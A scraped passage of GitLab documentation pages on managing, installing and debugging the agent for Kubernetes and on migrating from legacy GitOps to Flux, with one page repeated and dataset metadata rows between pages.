/history >}} In addition to the agents owned by your project, you can also view agents shared with the [`ci_access`](ci_cd_workflow.md) and [`user_access`](user_access.md) keywords. Once an agent is shared with a project, it automatically appears in the project agent tab. To view the list of shared agents: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Kubernetes clusters**. 1. Select the **Agent** tab. The list of shared agents and their clusters are displayed. ## View an agent's activity information The activity logs help you to identify problems and get the information you need for troubleshooting. You can see events from a week before the current date. To view an agent's activity: 1. On the left sidebar, select **Search or go to** and find the project that contains your agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. Select the agent you want to see activity for. The activity list includes: - Agent registration events: When a new token is **created**. - Connection events: When an agent is successfully **connected** to a cluster. The connection status is logged when you connect an agent for the first time or after more than an hour of inactivity. View and provide feedback about the UI in [this epic](https://gitlab.com/groups/gitlab-org/-/epics/4739). ## Debug the agent {{< history >}} - The `grpc_level` was [introduced](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/merge_requests/669) in GitLab 15.1. {{< /history >}} To debug the cluster-side component (`agentk`) of the agent, set the log level according to the available options: - `error` - `info` - `debug` The agent has two loggers: - A general purpose logger, which defaults to `info`. - A gRPC logger, which defaults to `error`. You can change your log levels by using a top-level `observability` section in the [agent configuration file](#configure-your-agent), for example setting the levels to `debug` and `warn`: ```yaml observability: logging: level: debug grpc_level: warn ``` When `grpc_level` is set to `info` or below, there are a lot of gRPC logs. Commit the configuration changes and inspect the agent service logs: ```shell kubectl logs -f -l=app=gitlab-agent -n gitlab-agent ``` For more information about debugging, see [troubleshooting documentation](troubleshooting.md). ## Reset the agent token {{< history >}} - Two-token limit [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/361030/) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `cluster_agents_limit_tokens_created`. - Two-token limit [generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/412399) in GitLab 16.2. Feature flag `cluster_agents_limit_tokens_created` removed. {{< /history >}} An agent can have only two active tokens at one time. To reset the agent token without downtime: 1. Create a new token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Kubernetes clusters**. 1. Select the agent you want to create a token for. 1. On the **Access tokens** tab, select **Create token**. 1. Enter token's name and description (optional) and select **Create token**. 1. Securely store the generated token. 1. Use the token to [install the agent in your cluster](install/_index.md#install-the-agent-in-the-cluster) and to [update the agent](install/_index.md#update-the-agent-version) to another version. 1. To delete the token you're no longer using, return to the token list and select **Revoke** ({{< icon name="remove" >}}). ## Remove an agent You can remove an agent by using the [GitLab UI](#remove-an-agent-through-the-gitlab-ui) or the [GraphQL API](#remove-an-agent-with-the-gitlab-graphql-api). The agent and any associated tokens are removed from GitLab, but no changes are made in your Kubernetes cluster. You must clean up those resources manually. ### Remove an agent through the GitLab UI To remove an agent from the UI: 1. On the left sidebar, select **Search or go to** and find the project that contains the agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. In the table, in the row for your agent, in the **Options** column, select the vertical ellipsis ({{< icon name="ellipsis_v" >}}). 1. Select **Delete agent**. ### Remove an agent with the GitLab GraphQL API 1. Get the `<cluster-agent-token-id>` from a query in the interactive GraphQL explorer. - For GitLab.com, go to <https://gitlab.com/-/graphql-explorer> to open GraphQL Explorer. - For GitLab Self-Managed, go to `https://gitlab.example.com/-/graphql-explorer`, replacing `gitlab.example.com` with your instance's URL. ```graphql query{ project(fullPath: "<full-path-to-agent-configuration-project>") { clusterAgent(name: "<agent-name>") { id tokens { edges { node { id } } } } } } ``` 1. Remove an agent record with GraphQL by deleting the `clusterAgentToken`. ```graphql mutation deleteAgent { clusterAgentDelete(input: { id: "<cluster-agent-id>" } ) { errors } } mutation deleteToken { clusterAgentTokenDelete(input: { id: "<cluster-agent-token-id>" }) { errors } } ``` 1. Verify whether the removal occurred successfully. If the output in the Pod logs includes `unauthenticated`, it means that the agent was successfully removed: ```json { "level": "warn", "time": "2021-04-29T23:44:07.598Z", "msg": "GetConfiguration.Recv failed", "error": "rpc error: code = Unauthenticated desc = unauthenticated" } ``` 1. Delete the agent in your cluster: ```shell kubectl delete -n gitlab-kubernetes-agent -f ./resources.yml ``` ## Related topics - [Manage an agent's workspaces](../../workspace/_index.md#manage-workspaces-at-the-agent-level)
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Managing the agent for Kubernetes instances breadcrumbs: - doc - user - clusters - agent --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Use the following tasks when you work with the agent for Kubernetes. ## View your agents The installed `agentk` version is displayed on the **Agent** tab. Prerequisites: - You must have at least the Developer role. To view the list of agents: 1. On the left sidebar, select **Search or go to** and find the project that contains your agent configuration file. You cannot view registered agents from a project that does not contain the agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. Select **Agent** tab to view clusters connected to GitLab through the agent. On this page, you can view: - All the registered agents for the current project. - The connection status. - The version of `agentk` installed on your cluster. - The path to each agent configuration file. ### Configure your agent To configure your agent: - Add content to the `config.yaml` file optionally created [during installation](install/_index.md#create-an-agent-configuration-file). You can quickly locate an agent configuration file from the list of agents. The **Configuration** column indicates the location of the `config.yaml` file, or shows how to create one. The agent configuration file manages the various agent features: - For a GitLab CI/CD workflow. You must [authorize the agent to access your projects](ci_cd_workflow.md#authorize-agent-access), and then [add `kubectl` commands to your `.gitlab-ci.yml` file](ci_cd_workflow.md#update-your-gitlab-ciyml-file-to-run-kubectl-commands). - For [user access](user_access.md) to the cluster from the GitLab UI or from the local terminal. - For configuring [operational container scanning](vulnerabilities.md). - For configuring [remote workspaces](../../workspace/gitlab_agent_configuration.md). ## View shared agents {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/395498) in GitLab 16.1. {{< /history >}} In addition to the agents owned by your project, you can also view agents shared with the [`ci_access`](ci_cd_workflow.md) and [`user_access`](user_access.md) keywords. Once an agent is shared with a project, it automatically appears in the project agent tab. To view the list of shared agents: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Kubernetes clusters**. 1. Select the **Agent** tab. The list of shared agents and their clusters are displayed. ## View an agent's activity information The activity logs help you to identify problems and get the information you need for troubleshooting. You can see events from a week before the current date. To view an agent's activity: 1. On the left sidebar, select **Search or go to** and find the project that contains your agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. Select the agent you want to see activity for. The activity list includes: - Agent registration events: When a new token is **created**. - Connection events: When an agent is successfully **connected** to a cluster. The connection status is logged when you connect an agent for the first time or after more than an hour of inactivity. View and provide feedback about the UI in [this epic](https://gitlab.com/groups/gitlab-org/-/epics/4739). ## Debug the agent {{< history >}} - The `grpc_level` was [introduced](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/merge_requests/669) in GitLab 15.1. {{< /history >}} To debug the cluster-side component (`agentk`) of the agent, set the log level according to the available options: - `error` - `info` - `debug` The agent has two loggers: - A general purpose logger, which defaults to `info`. - A gRPC logger, which defaults to `error`. You can change your log levels by using a top-level `observability` section in the [agent configuration file](#configure-your-agent), for example setting the levels to `debug` and `warn`: ```yaml observability: logging: level: debug grpc_level: warn ``` When `grpc_level` is set to `info` or below, there are a lot of gRPC logs. Commit the configuration changes and inspect the agent service logs: ```shell kubectl logs -f -l=app=gitlab-agent -n gitlab-agent ``` For more information about debugging, see [troubleshooting documentation](troubleshooting.md). ## Reset the agent token {{< history >}} - Two-token limit [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/361030/) in GitLab 16.1 with a [flag](../../../administration/feature_flags/_index.md) named `cluster_agents_limit_tokens_created`. - Two-token limit [generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/412399) in GitLab 16.2. Feature flag `cluster_agents_limit_tokens_created` removed. {{< /history >}} An agent can have only two active tokens at one time. To reset the agent token without downtime: 1. Create a new token: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Operate > Kubernetes clusters**. 1. Select the agent you want to create a token for. 1. On the **Access tokens** tab, select **Create token**. 1. Enter token's name and description (optional) and select **Create token**. 1. Securely store the generated token. 1. Use the token to [install the agent in your cluster](install/_index.md#install-the-agent-in-the-cluster) and to [update the agent](install/_index.md#update-the-agent-version) to another version. 1. To delete the token you're no longer using, return to the token list and select **Revoke** ({{< icon name="remove" >}}). ## Remove an agent You can remove an agent by using the [GitLab UI](#remove-an-agent-through-the-gitlab-ui) or the [GraphQL API](#remove-an-agent-with-the-gitlab-graphql-api). The agent and any associated tokens are removed from GitLab, but no changes are made in your Kubernetes cluster. You must clean up those resources manually. ### Remove an agent through the GitLab UI To remove an agent from the UI: 1. On the left sidebar, select **Search or go to** and find the project that contains the agent configuration file. 1. Select **Operate > Kubernetes clusters**. 1. In the table, in the row for your agent, in the **Options** column, select the vertical ellipsis ({{< icon name="ellipsis_v" >}}). 1. Select **Delete agent**. ### Remove an agent with the GitLab GraphQL API 1. Get the `<cluster-agent-token-id>` from a query in the interactive GraphQL explorer. - For GitLab.com, go to <https://gitlab.com/-/graphql-explorer> to open GraphQL Explorer. - For GitLab Self-Managed, go to `https://gitlab.example.com/-/graphql-explorer`, replacing `gitlab.example.com` with your instance's URL. ```graphql query{ project(fullPath: "<full-path-to-agent-configuration-project>") { clusterAgent(name: "<agent-name>") { id tokens { edges { node { id } } } } } } ``` 1. Remove an agent record with GraphQL by deleting the `clusterAgentToken`. ```graphql mutation deleteAgent { clusterAgentDelete(input: { id: "<cluster-agent-id>" } ) { errors } } mutation deleteToken { clusterAgentTokenDelete(input: { id: "<cluster-agent-token-id>" }) { errors } } ``` 1. Verify whether the removal occurred successfully. If the output in the Pod logs includes `unauthenticated`, it means that the agent was successfully removed: ```json { "level": "warn", "time": "2021-04-29T23:44:07.598Z", "msg": "GetConfiguration.Recv failed", "error": "rpc error: code = Unauthenticated desc = unauthenticated" } ``` 1. Delete the agent in your cluster: ```shell kubectl delete -n gitlab-kubernetes-agent -f ./resources.yml ``` ## Related topics - [Manage an agent's workspaces](../../workspace/_index.md#manage-workspaces-at-the-agent-level)
https://docs.gitlab.com/user/clusters/agent/migrate_to_flux
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/agent/migrate_to_flux.md
2025-08-13
doc/user/clusters/agent/gitops
[ "doc", "user", "clusters", "agent", "gitops" ]
migrate_to_flux.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Migrate from legacy GitOps to Flux
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Most users can migrate from their legacy agent-based GitOps solution to Flux without additional work or downtime. In most cases, Flux can take over existing workloads without any restarts. ## Example GitOps configuration Your legacy GitOps setup might contain an agent configuration like: ```yaml gitops: manifest_projects: - id: <your-group>/<your-repository> paths: - glob: 'manifests/*.yaml' ``` The `manifests` directory referenced in the `paths.glob` might have two manifests. One manifest defines a `Namespace`: ```yaml # /manifests/namespace.yaml --- apiVersion: v1 kind: Namespace metadata: name: production ``` And the other manifest defines a `Deployment`: ```yaml # /manifests/deployment.yaml --- apiVersion: apps/v1 kind: Deployment metadata: name: nginx-deployment namespace: production labels: app: nginx spec: replicas: 3 selector: matchLabels: app: nginx template: metadata: labels: app: nginx spec: containers: - name: nginx image: nginx:1.14.2 ports: - containerPort: 80 ``` The topics on this page use this configuration to demonstrate a migration to Flux. ## Disable legacy GitOps functionality in the agent When the GitOps configuration is removed, the agent doesn't delete any running workloads it applied. To remove the GitOps functionality from your agent: - Delete the `gitops` section from the agent configuration file. You still need a functional agent, so don't delete your entire `config.yaml` file. If you have multiple items under `gitops.manifest_projects` or under the `paths` list, you can migrate one part at a time by removing only the specific project or path. ## Bootstrap Flux Before you begin: - You disabled the GitOps functionality in your agent. - You installed the Flux CLI in a terminal with access to your cluster. To bootstrap Flux: - In your terminal, run the `flux bootstrap gitlab` command. For example: ```shell flux bootstrap gitlab \ --owner=<your-group> \ --repository=<your-repository> \ --branch=main \ --path=manifests/ \ --deploy-token-auth ``` Flux is installed on your cluster, and the necessary Flux configuration files are committed to `manifests/flux-system`, which syncs Flux and the entire `manifests` directory. Because the workloads (the `Namespace` and `Deployment` manifests) are already declared in the `manifests` directory, there is no extra work involved. For more information about configuring Flux with GitLab, see [Tutorial: Set up Flux for GitOps](../getting_started.md). ## Troubleshooting ### `flux bootstrap` doesn't reconcile manifests correctly The `flux bootstrap` command creates a `kustomizations.kustomize.toolkit.fluxcd.io` resource that points to the `manifests` directory. This resource applies to all the Kubernetes manifests in the directory, without requiring a [Kustomization file](https://kubectl.docs.kubernetes.io/references/kustomize/glossary/#kustomization). This process might not work with your configuration. To troubleshoot, review the Flux Kustomization status for potential issues: ```shell kubectl get kustomizations.kustomize.toolkit.fluxcd.io -n flux-system ``` ### Use a `default_namespace` in the agent configuration You might encounter an issue if your legacy agent-based GitOps setup refers to a `default_namespace` in the agent configuration, but omits this namespace in the manifests itself. This causes an error where your bootstrapped Flux doesn't know that your existing manifests are applied to the `default_namespace`. To solve this issue, you can either: - Set the namespace manually in your previously existing resource YAML. - Move your resources into a dedicated directory, and point Flux at it with `kustomize.toolkit.fluxcd.io/Kustomization`, where `spec.targetNamespace` specifies the namespace. - Move the resources into a subdirectory and add a `kustomization.yaml` file that sets the `spec.namespace` property. If you prefer to move the resources outside the path already configured for Flux, you should use `kustomize.toolkit.fluxcd.io/Kustomization`. If you prefer to move the resources into a subdirectory of a path already watched by Flux, you should use a `kustomize.config.k8s.io/Kustomization`.
--- stage: Deploy group: Environments info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrate from legacy GitOps to Flux breadcrumbs: - doc - user - clusters - agent - gitops --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Most users can migrate from their legacy agent-based GitOps solution to Flux without additional work or downtime. In most cases, Flux can take over existing workloads without any restarts. ## Example GitOps configuration Your legacy GitOps setup might contain an agent configuration like: ```yaml gitops: manifest_projects: - id: <your-group>/<your-repository> paths: - glob: 'manifests/*.yaml' ``` The `manifests` directory referenced in the `paths.glob` might have two manifests. One manifest defines a `Namespace`: ```yaml # /manifests/namespace.yaml --- apiVersion: v1 kind: Namespace metadata: name: production ``` And the other manifest defines a `Deployment`: ```yaml # /manifests/deployment.yaml --- apiVersion: apps/v1 kind: Deployment metadata: name: nginx-deployment namespace: production labels: app: nginx spec: replicas: 3 selector: matchLabels: app: nginx template: metadata: labels: app: nginx spec: containers: - name: nginx image: nginx:1.14.2 ports: - containerPort: 80 ``` The topics on this page use this configuration to demonstrate a migration to Flux. ## Disable legacy GitOps functionality in the agent When the GitOps configuration is removed, the agent doesn't delete any running workloads it applied. To remove the GitOps functionality from your agent: - Delete the `gitops` section from the agent configuration file. You still need a functional agent, so don't delete your entire `config.yaml` file. If you have multiple items under `gitops.manifest_projects` or under the `paths` list, you can migrate one part at a time by removing only the specific project or path. ## Bootstrap Flux Before you begin: - You disabled the GitOps functionality in your agent. - You installed the Flux CLI in a terminal with access to your cluster. To bootstrap Flux: - In your terminal, run the `flux bootstrap gitlab` command. For example: ```shell flux bootstrap gitlab \ --owner=<your-group> \ --repository=<your-repository> \ --branch=main \ --path=manifests/ \ --deploy-token-auth ``` Flux is installed on your cluster, and the necessary Flux configuration files are committed to `manifests/flux-system`, which syncs Flux and the entire `manifests` directory. Because the workloads (the `Namespace` and `Deployment` manifests) are already declared in the `manifests` directory, there is no extra work involved. For more information about configuring Flux with GitLab, see [Tutorial: Set up Flux for GitOps](../getting_started.md). ## Troubleshooting ### `flux bootstrap` doesn't reconcile manifests correctly The `flux bootstrap` command creates a `kustomizations.kustomize.toolkit.fluxcd.io` resource that points to the `manifests` directory. This resource applies to all the Kubernetes manifests in the directory, without requiring a [Kustomization file](https://kubectl.docs.kubernetes.io/references/kustomize/glossary/#kustomization). This process might not work with your configuration. To troubleshoot, review the Flux Kustomization status for potential issues: ```shell kubectl get kustomizations.kustomize.toolkit.fluxcd.io -n flux-system ``` ### Use a `default_namespace` in the agent configuration You might encounter an issue if your legacy agent-based GitOps setup refers to a `default_namespace` in the agent configuration, but omits this namespace in the manifests itself. This causes an error where your bootstrapped Flux doesn't know that your existing manifests are applied to the `default_namespace`. To solve this issue, you can either: - Set the namespace manually in your previously existing resource YAML. - Move your resources into a dedicated directory, and point Flux at it with `kustomize.toolkit.fluxcd.io/Kustomization`, where `spec.targetNamespace` specifies the namespace. - Move the resources into a subdirectory and add a `kustomization.yaml` file that sets the `spec.namespace` property. If you prefer to move the resources outside the path already configured for Flux, you should use `kustomize.toolkit.fluxcd.io/Kustomization`. If you prefer to move the resources into a subdirectory of a path already watched by Flux, you should use a `kustomize.config.k8s.io/Kustomization`.
https://docs.gitlab.com/user/clusters/agent/install
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/user/clusters/agent/_index.md
2025-08-13
doc/user/clusters/agent/install
[ "doc", "user", "clusters", "agent", "install" ]
_index.md
Deploy
Environments
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Installing the agent for Kubernetes
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} To connect a Kubernetes cluster to GitLab, you must install an agent in your cluster. ## Prerequisites Before you can install the agent in your cluster, you need: - An existing [Kubernetes cluster that you can connect to from your local terminal](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/). If you don't have a cluster, you can create one on a cloud provider, like: - [Amazon Elastic Kubernetes Service (EKS)](https://docs.aws.amazon.com/eks/latest/userguide/getting-started.html) - [Azure Kubernetes Service (AKS)](https://learn.microsoft.com/en-us/azure/aks/what-is-aks) - [Digital Ocean](https://docs.digitalocean.com/products/kubernetes/getting-started/quickstart/) - [Google Kubernetes Engine (GKE)](https://cloud.google.com/kubernetes-engine/docs/deploy-app-cluster) - You should use [Infrastructure as Code techniques](../../../infrastructure/iac/_index.md) for managing infrastructure resources at scale. - Access to an agent server: - On GitLab.com, the agent server is available at `wss://kas.gitlab.com`. - On GitLab Self-Managed, a GitLab administrator must set up the [agent server](../../../../administration/clusters/kas.md). Then it is available by default at `wss://gitlab.example.com/-/kubernetes-agent/`. - On GitLab Dedicated, the agent server is available at `wss://kas.<instance-domain>`, for example `wss://kas.example.gitlab-dedicated.com`. If you use a [custom hostname](../../../../administration/dedicated/configure_instance/network_security.md#bring-your-own-domain-byod) for your GitLab Dedicated instance, you can also choose a custom hostname for the KAS service. ## Bootstrap the agent with Flux support (recommended) You can install the agent by bootstrapping it with the [GitLab CLI (`glab`)](../../../../editor_extensions/gitlab_cli/_index.md) and Flux. Prerequisites: - You have the following command-line tools installed: - `glab` - `kubectl` - `flux` - You have a local cluster connection that works with `kubectl` and `flux`. - You [bootstrapped Flux](https://fluxcd.io/flux/installation/bootstrap/gitlab/) into the cluster with `flux bootstrap`. - Make sure to bootstrap Flux and the agent in compatible directories. If you bootstrapped Flux with the `--path` option, you must pass the same value to the `--manifest-path` option of the `glab cluster agent bootstrap` command. To install the agent, either: - Run `glab cluster agent bootstrap` within the directory of your Git repository of your target project: ```shell glab cluster agent bootstrap <agent-name> --manifest-path <same_path_used_in_flux_bootstrap> ``` - Run `glab -R path-with-namespace cluster agent bootstrap` if you must run the command outside of the Git repo of your target project: ```shell glab -R <full/path/to/project> cluster agent bootstrap <agent-name> --manifest-path <same_path_used_in_flux_bootstrap> ``` By default, the command: 1. Registers the agent. 1. Configures the agent. 1. Configures an environment with a dashboard for the agent. 1. Creates an agent token. 1. In the cluster, creates a Kubernetes secret with the agent token. 1. Commits the Flux Helm resources to the Git repository. 1. Triggers a Flux reconciliation. For customization options, run `glab cluster agent bootstrap --help`. You probably want to use at least the `--path <flux_manifests_directory>` option. ## Install the agent manually It takes three steps to install the agent in your cluster: 1. Optional. [Create an agent configuration file](#create-an-agent-configuration-file). 1. [Register the agent with GitLab](#register-the-agent-with-gitlab). 1. [Install the agent in your cluster](#install-the-agent-in-the-cluster). <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> Watch a [walk-through of this process](https://www.youtube.com/watch?v=XuBpKtsgGkE). <!-- Video published on 2021-09-02 --> ### Create an agent configuration file For configuration settings, the agent uses a YAML file in the GitLab project. Adding an agent configuration file is optional. You must create this file if: - You use [a GitLab CI/CD workflow](../ci_cd_workflow.md#use-gitlab-cicd-with-your-cluster) and want to authorize a different project or group to access the agent. - You [allow specific project or group members to access Kubernetes](../user_access.md). To create an agent configuration file: 1. Choose a name for your agent. The agent name follows the [DNS label standard from RFC 1123](https://www.rfc-editor.org/rfc/rfc1123). The name must: - Be unique in the project. - Contain at most 63 characters. - Contain only lowercase alphanumeric characters or `-`. - Start with an alphanumeric character. - End with an alphanumeric character. 1. In the repository, in the default branch, create an agent configuration file at: ```plaintext .gitlab/agents/<agent-name>/config.yaml ``` You can leave the file blank for now, and [configure it](../work_with_agent.md#configure-your-agent) later. ### Register the agent with GitLab #### Option 1: Agent connects to GitLab You can create a new agent record directly from the GitLab UI. The agent can be registered without creating an agent configuration file. You must register an agent before you can install the agent in your cluster. To register an agent: 1. On the left sidebar, select **Search or go to** and find your project. If you have an [agent configuration file](#create-an-agent-configuration-file), it must be in this project. Your cluster manifest files should also be in this project. 1. Select **Operate > Kubernetes clusters**. 1. Select **Connect a cluster (agent)**. 1. In the **Name of new agent** field, enter a unique name for your agent. - If an [agent configuration file](#create-an-agent-configuration-file) with this name already exists, it is used. - If no configuration exists for this name, a new agent is created with the default configuration. 1. Select **Create and register**. 1. GitLab generates an access token for the agent. You need this token to install the agent in your cluster. {{< alert type="warning" >}} Securely store the agent access token. A bad actor can use this token to access source code in the agent's configuration project, access source code in any public project on the GitLab instance, or even, under very specific conditions, obtain a Kubernetes manifest. {{< /alert >}} 1. Copy the command under **Recommended installation method**. You need it when you use the one-liner installation method to install the agent in your cluster. #### Option 2: GitLab connects to agent (receptive agent) {{< details >}} - Tier: Ultimate - Offering: GitLab Self-Managed {{< /details >}} {{< history >}} - [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/12180) in GitLab 17.4. {{< /history >}} {{< alert type="note" >}} The GitLab Agent Helm Chart release does not fully support mTLS authentication. You should authenticate with the JWT method instead. Support for mTLS is tracked in [issue 64](https://gitlab.com/gitlab-org/charts/gitlab-agent/-/issues/64). {{< /alert >}} [Receptive agents](../_index.md#receptive-agents) allow GitLab to integrate with Kubernetes clusters that cannot establish a network connection to the GitLab instance, but can be connected to by GitLab. 1. Follow the steps in option 1 to register an agent in your cluster. Save the agent token and install command for later, but don't install the agent yet. 1. Prepare an authentication method. The GitLab-to-agent connection can be cleartext gRPC (`grpc://`) or encrypted gRPC (`grpcs://`, recommended). GitLab can authenticate to the agent in your cluster using: - A JWT token. Available in both `grpc://` and `grpcs://` configurations. You don't need to generate client certificates with this method. 1. Add a URL configuration to the agent with the [cluster agents API](../../../../api/cluster_agents.md#create-an-agent-url-configuration). If you delete the URL configuration, the receptive agent becomes an ordinary agent. You can associate a receptive agent with only one URL configuration at a time. 1. Install the agent into the cluster. Use the command you copied when you registered the agent, but remove the `--set config.kasAddress=...` parameter. JWT token authentication example. Note the added `config.receptive.enabled=true` and `config.api.jwt` settings: ```shell helm repo add gitlab https://charts.gitlab.io helm repo update helm upgrade --install my-agent gitlab/gitlab-agent \ --namespace ns \ --create-namespace \ --set config.token=.... \ --set config.receptive.enabled=true \ --set config.api.jwtPublicKey=<public_key from the response> ``` It might take up to 10 minutes for GitLab to start trying to establish a connection to the new agent. ### Install the agent in the cluster To connect your cluster to GitLab, [install the registered agent with Helm](#install-the-agent-with-helm). To install a receptive agent, follow the steps in [GitLab connects to agent (receptive agent)](#option-2-gitlab-connects-to-agent-receptive-agent). {{< alert type="note" >}} To connect to multiple clusters, you must configure, register, and install an agent in each cluster. Make sure to give each agent a unique name. {{< /alert >}} #### Install the agent with Helm {{< alert type="warning" >}} For simplicity, the default Helm chart configuration sets up a service account for the agent with `cluster-admin` rights. You should not use this on production systems. To deploy to a production system, follow the instructions in [Customize the Helm installation](#customize-the-helm-installation) to create a service account with the minimum permissions required for your deployment and specify that during installation. {{< /alert >}} To install the agent on your cluster using Helm: 1. [Install the Helm CLI](https://helm.sh/docs/intro/install/). 1. In your computer, open a terminal and [connect to your cluster](https://kubernetes.io/docs/tasks/access-application-cluster/access-cluster/). 1. Run the command you copied when you [registered your agent with GitLab](#register-the-agent-with-gitlab). The command should look like: ```shell helm repo add gitlab https://charts.gitlab.io helm repo update helm upgrade --install test gitlab/gitlab-agent \ --namespace gitlab-agent-test \ --create-namespace \ --set image.tag=<current agentk version> \ --set config.token=<your_token> \ --set config.kasAddress=<address_to_GitLab_KAS_instance> ``` 1. Optional. [Customize the Helm installation](#customize-the-helm-installation). If you install the agent on a production system, you should customize the Helm installation to restrict the permissions of the service account. Related customization options are described below. ##### Customize the Helm installation By default, the Helm installation command generated by GitLab: - Creates a namespace `gitlab-agent` for the deployment (`--namespace gitlab-agent`). You can skip creating the namespace by omitting the `--create-namespace` flag. - Sets up a service account for the agent and assigns it the `cluster-admin` role. You can: - Skip creating the service account by adding `--set serviceAccount.create=false` to the `helm install` command. In this case, you must set `serviceAccount.name` to a pre-existing service account. - Customise the role assigned to the service account by adding `--set rbac.useExistingRole <your role name>` to the `helm install` command. In this case, you should have a pre-created role with restricted permissions that can be used by the service account. - Skip role assignment altogether by adding `--set rbac.create=false` to your `helm install` command. In this case, you must create `ClusterRoleBinding` manually. - Creates a `Secret` resource for the agent's access token. To instead bring your own secret with a token, omit the token (`--set token=...`) and instead use `--set config.secretName=<your secret name>`. - Creates a `Deployment` resource for the `agentk` pod. To see the full list of customizations available, see the Helm chart's [README](https://gitlab.com/gitlab-org/charts/gitlab-agent/-/blob/main/README.md#values). ##### Use the agent when KAS is behind a self-signed certificate When [KAS](../../../../administration/clusters/kas.md) is behind a self-signed certificate, you can set the value of `config.kasCaCert` to the certificate. For example: ```shell helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --set-file config.kasCaCert=my-custom-ca.pem ``` In this example, `my-custom-ca.pem` is the path to a local file that contains the CA certificate used by KAS. The certificate is automatically stored in a config map and mounted in the `agentk` pod. If KAS is installed with the GitLab chart, and the chart is configured to provide an [auto-generated self-signed wildcard certificate](https://docs.gitlab.com/charts/installation/tls.html#option-4-use-auto-generated-self-signed-wildcard-certificate), you can extract the CA certificate from the `RELEASE-wildcard-tls-ca` secret. ##### Use the agent behind an HTTP proxy {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/351867) in GitLab 15.0, the GitLab agent Helm chart supports setting environment variables. {{< /history >}} To configure an HTTP proxy when using the Helm chart, you can use the environment variables `HTTP_PROXY`, `HTTPS_PROXY`, and `NO_PROXY`. Upper and lowercase are both acceptable. You can set these variables by using the `extraEnv` value, as a list of objects with keys `name` and `value`. For example, to set only the environment variable `HTTPS_PROXY` to the value `https://example.com/proxy`, you can run: ```shell helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --set extraEnv[0].name=HTTPS_PROXY \ --set extraEnv[0].value=https://example.com/proxy \ ... ``` {{< alert type="note" >}} DNS rebind protection is disabled when either the `HTTP_PROXY` or the `HTTPS_PROXY` environment variable is set, and the domain DNS can't be resolved. {{< /alert >}} ## Install multiple agents in your cluster {{< alert type="note" >}} In most cases, you should run one agent per cluster and use the agent impersonation features (Premium and Ultimate only) to support multi-tenancy. If you must run multiple agents, we would love to hear from you about any issues you encounter. You can provide your feedback in [issue 454110](https://gitlab.com/gitlab-org/gitlab/-/issues/454110). {{< /alert >}} To install a second agent in your cluster, you can follow the [previous steps](#register-the-agent-with-gitlab) a second time. To avoid resource name collisions within the cluster, you must either: - Use a different release name for the agent, for example, `second-gitlab-agent`: ```shell helm upgrade --install second-gitlab-agent gitlab/gitlab-agent ... ``` - Or, install the agent in a different namespace, for example, `different-namespace`: ```shell helm upgrade --install gitlab-agent gitlab/gitlab-agent \ --namespace different-namespace \ ... ``` Because each agent in a cluster runs independently, reconciliations are triggered by every agent with the Flux module enabled. [Issue 357516](https://gitlab.com/gitlab-org/gitlab/-/issues/357516) proposes to change this behavior. As a workaround, you can: - Configure RBAC with the agent so that it only accesses the Flux resources it needs. - Disable the Flux module on the agents that don't use it. ## Example projects The following example projects can help you get started with the agent. - [Distinct application and manifest repository example](https://gitlab.com/gitlab-examples/ops/gitops-demo/hello-world-service-gitops) - [Auto DevOps setup that uses the CI/CD workflow](https://gitlab.com/gitlab-examples/ops/gitops-demo/hello-world-service) - [Cluster management project template example that uses the CI/CD workflow](https://gitlab.com/gitlab-examples/ops/gitops-demo/cluster-management) ## Updates and version compatibility GitLab warns you on the agent's list page to update the agent version installed on your cluster. For the best experience, the version of the agent installed in your cluster should match the GitLab major and minor version. The previous and next minor versions are also supported. For example, if your GitLab version is v14.9.4 (major version 14, minor version 9), then versions v14.9.0 and v14.9.1 of the agent are ideal, but any v14.8.x or v14.10.x version of the agent is also supported. See [the release page](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/releases) of the GitLab agent for Kubernetes. ### Update the agent version {{< alert type="note" >}} Instead of using `--reuse-values`, you should specify all needed values. If you use `--reuse-values`, you might miss new defaults or use deprecated values. To retrieve previous `--set` arguments, use `helm get values <release name>`. You can save the values to a file with `helm get values gitlab-agent > agent.yaml`, and pass the file to Helm with `-f`: `helm upgrade gitlab-agent gitlab/gitlab-agent -f agent.yaml`. This safely replaces the behavior of 